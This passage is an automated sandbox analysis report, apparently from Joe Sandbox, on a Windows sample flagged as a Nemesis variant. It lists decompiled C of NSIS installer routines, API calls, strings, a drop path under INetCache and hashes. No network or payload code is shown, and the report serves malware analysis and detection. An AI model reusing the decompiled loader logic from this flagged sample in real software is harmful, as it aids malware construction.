						goto L14;
					}
				}
			}

0x00403996
0x0040399f
0x004039a6
0x004039a8
0x004039bc
0x004039ce
0x004039d7
0x004039e0
0x004039e7
0x004039ec
0x004039f3
0x00403a06
0x00403a06
0x00403a11
0x004039aa
0x004039aa
0x004039b5
0x004039b5
0x00403a16
0x00403a20
0x00403a29
0x00403a2e
0x00403a3f
0x00403ad1
0x00403ad9
0x00403ae2
0x00403ae2
0x00403af8
0x00403afe
0x00403b0c
0x00403b8d
0x00403b95
0x00403b9f
0x00403ba4
0x00403baa
0x00403c34
0x00403c39
0x00403c3b
0x00403c57
0x00000000
0x00403c57
0x00403c3d
0x00403c43
0x00403c4b
0x00403c4b
0x00000000
0x00403c43
0x00403bb8
0x00403bc3
0x00403bc8
0x00403bca
0x00403bd1
0x00403bd1
0x00403bdc
0x00403be4
0x00403be6
0x00403be8
0x00403bf1
0x00403bf4
0x00403bfa
0x00403bfa
0x00403c19
0x00403c2a
0x00000000
0x00403c2f
0x00403b97
0x00403b99
0x00000000
0x00403b0e
0x00403b0e
0x00403b1a
0x00403b24
0x00403b2a
0x00403b2f
0x00403b3e
0x00403c5c
0x00403c5c
0x00000000
0x00403c5c
0x00403b4d
0x00403b88
0x00000000
0x00403b88
0x00403a45
0x00403a45
0x00403a48
0x00403a4a
0x00000000
0x00000000
0x00403a58
0x00403a6a
0x00403a6f
0x00403a78
0x00000000
0x00000000
0x00403a7e
0x00403a80
0x00403a8d
0x00403a8d
0x00403a96
0x00403a9c
0x00403ac4
0x00403acc
0x00000000
0x00403aae
0x00403aaf
0x00403ab8
0x00403abe
0x00403abf
0x00000000
0x00403abf
0x00403aba
0x00403abc
0x00000000
0x00000000
0x00000000
0x00403abc
0x00403a9c

APIs

Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689

GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75523420,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",00000000), ref: 004039AA

Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6

lstrcatW.KERNEL32(1033,0042D248), ref: 00403A11
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry), ref: 00403AF8
RegisterClassW.USER32(00433E80), ref: 00403B35
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
ShowWindow.USER32(00000005,00000000), ref: 00403BB8
GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
RegisterClassW.USER32(00433E80), ref: 00403BFA
DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19

Strings

Call, xrefs: 00403A58, 00403A61, 00403A6F, 00403ABE, 00403AC4
RichEd20, xrefs: 00403BBE
RichEd32, xrefs: 00403BCC
_Nb, xrefs: 00403B14, 00403B7C
.DEFAULT\Control Panel\International, xrefs: 004039FC
RichEdit20W, xrefs: 00403BDC, 00403BE2
.exe, xrefs: 00403A9E
1033, xrefs: 004039B0, 00403A0C
Control Panel\Desktop\ResourceLocale, xrefs: 004039C4
C:\Users\user\AppData\Local\Temp\, xrefs: 0040399C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry, xrefs: 00403A20, 00403A28, 00403ACB, 00403AD1, 00403AE1
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00403994
RichEdit, xrefs: 00403BEB

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ligtorn\Pantry$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-2337917425
Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC1 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe";
				 *0x434ef0 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", 0x400);
				_t89 = E00405D74(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E00406282(L"C:\\Users\\Arthur\\Desktop", _t91);
				E00406282(0x443000, E00405B9F(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x422a04 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D(1);
					__eflags =  *0x434ef8 - _t82;
					if( *0x434ef8 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E0040332B( *0x434ef8 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x434ef4 = _t94;
							 *0x434efc =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f00 =  *0x434f00 + 1;
								__eflags =  *0x434f00;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D2F(0x434f20, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E0040332B( *0x4169f8);
					_t65 = E00403315( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434ef8) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E00403315(0x422a08, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x434ef8;
						if( *0x434ef8 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405D2F( &_v44, 0x422a08, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x4169f8; // 0x81503
						 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x434ef8 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x422a04; // 0x81c18
						if(__eflags < 0) {
							_v12 = E0040674F(_v12, 0x422a08, _t90);
						}
						 *0x4169f8 =  *0x4169f8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ec9
0x00402ecc
0x00402ecf
0x00402ed2
0x00402ed8
0x00402ee9
0x00402eee
0x00402f01
0x00402f06
0x00402f09
0x00402f0f
0x00000000
0x00402f11
0x00402f1c
0x00402f22
0x00402f33
0x00402f3a
0x00402f40
0x00402f42
0x00402f47
0x00402f49
0x00403036
0x00403038
0x0040303d
0x00403044
0x00000000
0x00000000
0x00403046
0x00403049
0x0040306d
0x00403072
0x00403078
0x00403083
0x00403088
0x0040308b
0x0040308c
0x0040308d
0x0040308f
0x00403094
0x00403097
0x004030aa
0x004030ae
0x004030b6
0x004030bb
0x004030bd
0x004030bd
0x004030bd
0x004030c5
0x004030c5
0x004030c8
0x004030c9
0x004030c9
0x004030cc
0x004030ce
0x004030ce
0x004030ce
0x004030d8
0x004030de
0x004030ec
0x004030f1
0x00000000
0x004030f1
0x00000000
0x00403097
0x00403051
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00403068
0x0040306b
0x00000000
0x00000000
0x00000000
0x00402f4f
0x00402f54
0x00402f59
0x00402f5d
0x00402f64
0x00402f69
0x00402f6b
0x00402f6d
0x00402f6d
0x00402f71
0x00402f76
0x00402f78
0x004030a2
0x00403099
0x00000000
0x00403099
0x00402f7e
0x00402f85
0x00403001
0x00403005
0x00403009
0x0040300e
0x00000000
0x00403005
0x00402f8e
0x00402f93
0x00402f96
0x00402f9b
0x00000000
0x00000000
0x00402f9d
0x00402fa4
0x00000000
0x00000000
0x00402fa6
0x00402fad
0x00000000
0x00000000
0x00402faf
0x00402fb6
0x00000000
0x00000000
0x00402fb8
0x00402fbf
0x00000000
0x00000000
0x00402fc1
0x00402fc7
0x00402fd0
0x00402fd6
0x00402fd9
0x00402fdb
0x00402fe1
0x00000000
0x00000000
0x00402fe7
0x00402feb
0x00402ff3
0x00402ff3
0x00402ff6
0x00402ff6
0x00402ff9
0x00402ffb
0x00402ffd
0x00402ffd
0x00000000
0x00402ffb
0x00402fed
0x00402ff1
0x00000000
0x00000000
0x00000000
0x0040300f
0x0040300f
0x00403015
0x00403021
0x00403021
0x00403024
0x0040302a
0x0040302c
0x0040302c
0x00403034
0x00403034
0x00000000
0x00403034

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

Error launching installer, xrefs: 00402F11
Null, xrefs: 00402FB8
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
Inst, xrefs: 00402FA6
C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
soft, xrefs: 00402FAF
C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe", xrefs: 00402EC1
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-3518573332
Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C

Uniqueness

Uniqueness Score: -1.00%

Function 004062A4 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004062A4(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x433ebc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x434f38 + _t43 * 2;
				_t44 = 0x432e80;
				_t110 = 0x432e80;
				if(_a4 >= 0x432e80 && _a4 - 0x432e80 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E004062A4(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x432e80;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x435000;
							E00406282(_t110, (_t106 << 0xb) + 0x435000);
						} else {
							E004061C9(_t110,  *0x434ee8);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E00406516(_t110);
						}
						goto L43;
					}
					_t86 =  *0x434eec;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x434f84;
						if( *0x434f84 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x434ee4;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x434ee8,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E00406150( *0x434f38, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040);
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E004062A4(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E00406282(_a4, _t44);
			}

0x004062a4
0x004062a4
0x004062a4
0x004062aa
0x004062af
0x004062c0
0x004062c0
0x004062c8
0x004062c9
0x004062ca
0x004062cb
0x004062ce
0x004062d6
0x004062d8
0x004062f1
0x004062f4
0x004062f4
0x004064f0
0x004064f0
0x004064f6
0x00000000
0x00000000
0x00406304
0x0040630a
0x00000000
0x00000000
0x00406312
0x00406313
0x00406315
0x00406319
0x0040631c
0x004064dd
0x004064eb
0x004064ee
0x004064ee
0x004064df
0x004064e2
0x004064e5
0x004064e7
0x004064e7
0x00000000
0x004064dd
0x00406322
0x00406325
0x00406334
0x0040633b
0x00406345
0x00406349
0x0040634c
0x0040634f
0x00406354
0x00406359
0x0040635d
0x00406360
0x00406480
0x00406484
0x004064b7
0x004064bb
0x004064c0
0x004064c5
0x004064c5
0x004064ca
0x004064cb
0x004064d0
0x004064d3
0x004064d6
0x00000000
0x004064d6
0x00406486
0x00406489
0x0040648c
0x004064a1
0x004064a8
0x0040648e
0x00406495
0x00406495
0x004064b0
0x004064b3
0x00406478
0x00406479
0x00406479
0x00000000
0x004064b3
0x00406366
0x0040636e
0x00406370
0x00406371
0x0040638a
0x0040638a
0x00406391
0x00406391
0x00406398
0x0040639c
0x0040639c
0x0040639d
0x0040639f
0x004063da
0x004063dd
0x004063ed
0x004063f0
0x004063f8
0x004063fe
0x004063fe
0x0040645b
0x0040645b
0x0040645d
0x00000000
0x00000000
0x00406402
0x00406409
0x0040640a
0x0040640c
0x00406426
0x00406434
0x0040643a
0x0040643c
0x00406457
0x00406457
0x00406457
0x00000000
0x00406457
0x00406442
0x0040644d
0x00406453
0x00406455
0x00000000
0x00000000
0x00000000
0x00406455
0x0040640e
0x00406411
0x00000000
0x00000000
0x00406420
0x00406422
0x00406424
0x00000000
0x00000000
0x00000000
0x00406424
0x00000000
0x0040645b
0x004063e5
0x00000000
0x004063a1
0x004063bf
0x004063c4
0x004063c8
0x00406468
0x00406468
0x0040646b
0x00406473
0x00406473
0x00000000
0x0040646b
0x004063d0
0x0040645f
0x0040645f
0x00406463
0x00000000
0x00000000
0x00406465
0x00000000
0x00406465
0x0040639f
0x00406373
0x00406378
0x00000000
0x00000000
0x0040637a
0x0040637d
0x00000000
0x00000000
0x0040637f
0x00406382
0x00000000
0x00406384
0x00406384
0x00000000
0x00406384
0x00406382
0x004064fc
0x00406507
0x00406513
0x00406513
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000), ref: 004063F8
SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000), ref: 00406434
SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
CoTaskMemFree.OLE32(0041D800), ref: 0040644D
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,?,0040531D,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll,00000000), ref: 004064CB

Strings

Call, xrefs: 004062CE, 004063A9, 004063B0, 004063B4, 004063CE, 004063CF, 004063E4, 004063F7, 00406413, 0040643E, 00406472, 00406478, 00406494, 004064A7, 004064C4, 004064CA, 004064D6, 00406509
Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll, xrefs: 004062C9
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B5
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646D

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
